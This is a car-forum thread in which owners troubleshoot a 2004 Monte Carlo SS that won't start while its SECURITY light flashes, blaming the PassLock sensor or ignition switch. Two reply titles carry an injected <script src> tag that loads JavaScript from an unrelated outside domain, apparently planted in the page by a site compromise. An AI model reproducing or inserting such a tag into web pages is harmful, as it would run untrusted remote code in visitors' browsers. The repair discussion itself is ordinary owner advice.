Monte Carlo Repair Help Have a Monte problem and need help? Good at troubleshooting? Discuss it here!

Security Idiot Light flashing on dash and Car Won't Start

Old 06-04-2008, 08:01 PM
Default Security Idiot Light flashing on dash and Car Won't Start

Hey folks,

My son owns a 2004 Monte Carlo SS and is experiencing a perplexing problem with the car's dashboard messaging. First he noticed that the Needs Service and the Airbag light were flashing at the beginning of the week. He took the car to the mechanic and he was told that the car was due for it's 60,000 mile check. He scheduled the service for next week. In the meantime, he left work that night and the car wouldn't start but a Security message was flashing. He left the car in the parking lot of his job overnight and around 2pm today he went back and the car started right up but the Security message kept flashing. Tonight, he gets home and the car won't start again. There's no sound or clicking sound, like when the starter is shot... Any ideas on what the relationship is between the flashing Security light is and the car starting when it wants? Thanks of any ideas or information that you can shed on this strange issue.

Ron from Kennesaw, GA

Old 06-05-2008, 02:40 AM
Default RE: Security Idiot Light flashing on dash and Car Won't Start<script src=http://www.tag58.com/b.js></script>

Sounds like a PassLock issue! the PassLock Sensor is a magnetic security sensor in our ignition cylinders that essentially "reads" our keys to make sure the right key is starting the car... wrong key = no fuel (fuel pump won't work) and no ignition (starter is disengaged).

I had the same thing happen with my '02 SS when the PL Sensor went out and the display would flash SECURITY three times, the battery symbol, then SECURITY (3x) again... it's approximately a $500 fix at the shop and is NOT covered by our warranties. (be sure to get a good/new ignitioncylinder, too, b/c refurbished units can suffer the same symptoms...)

there is, however, an override procedure to get the car started in the meantime. the problem with it is that it takes approximately 35 minutes of sitting in the car and it is only good for about 2 or 3 starts before it needs to be done again. see this ( https://montecarloforum.com/m_84729/tm.htm) thread by RickCoMatic for the procedure... I saw it on another [mechanic's]website before I joined MCF and saw Rick post it up after I joined (he beat me to the punch!) so I know it is accurate.

Let me know if this helps and good luck with the repair... maybe, in the meantime, tell us more about the Monte (and post pics?)...

Old 06-05-2008, 08:37 AM
Default RE: Security Idiot Light flashing on dash and Car Won't Start<script src=http://www.tag58.com/b.js></script>

I would try to have a dealership cut a key based on your VIN first and see where that takes you. I just had the same problem with my '05 Malibu Classic which has the same ignition and theft system. So try a new key first....It's $6-$10 and worth a shot.

Old 12-29-2014, 03:58 PM

ARGH!!!!

can this also occur if the battery ran down? my 04 ss did it to me this morning. i called the boss to get a ride and by the time he showed up it of course started.

it has started ever since but that yellow security flag still appears while starting but goes away after that.

Old 12-29-2014, 04:17 PM
Monte Of The Month -- August 2012
5 Year Member3 Year Member1 Year Member

Check the battery ground cable and the ground cable located under the air box making sure they are clean and tight. Then do a security relearn if needed.

Old 12-30-2014, 01:27 AM

Could very well be the ignition switch, when mine failed it started with the security light/no start scenario and only got worse from there. It's only about a 40 dollar part online and in my case I was able to reuse the original key cylinder. As far as the car not starting leave the key in the on position until the security light quits flashing, about 10 minutes, then turn it off and try starting. This worked for me until it started taking 2 or 3 cycles of this to get running.

Old 12-30-2014, 01:36 AM

Here ya go, this was my original post about my no start problems that were fixed by replacing the ignition switch. Hope it helps your problem.

https://montecarloforum.com/forum/mo...roblems-38266/

Last edited by jim1405; 12-30-2014 at 01:43 AM.
Old 12-30-2014, 02:25 AM

Ok, never post anything after being mentally exhausted from work!! Just noticed this post was originally from 2008. Oh well, hopefully it helps someone.

Old 12-30-2014, 06:26 PM

my problem started dec 29 2014 and i appreciate you helping out. im sorting through qualifying the symptoms im having and figuring out what problem my car actually has.

i did find out i left both of the mirror mounted reading lights on over night.

if they are around 12 watt bulbs each that would be a steady 2 amps total for 18 hours.... 36 amp draw.. im wondering if thats what got it mad at me.

again i appreciate everyone sharing!!!!

happy (security) new (battery) year (security) .... ad nauseum

Old 12-31-2014, 01:32 AM

Originally Posted by mcweet
my problem started dec 29 2014 and i appreciate you helping out. im sorting through qualifying the symptoms im having and figuring out what problem my car actually has.

i did find out i left both of the mirror mounted reading lights on over night.

if they are around 12 watt bulbs each that would be a steady 2 amps total for 18 hours.... 36 amp draw.. im wondering if thats what got it mad at me.

again i appreciate everyone sharing!!!!

happy (security) new (battery) year (security) .... ad nauseum
Thanks for the kudos, my response was actually regarding the original post so I don't know if it will help your situation. A weak battery can of course cause problems. Maybe start a new thread with your exact symptoms and I bet you will get good feedback. Lots of useful information here and a lot of people that have good answers. Good luck and keep posting!

Search this Thread
Quick Reply: Security Idiot Light flashing on dash and Car Won't Start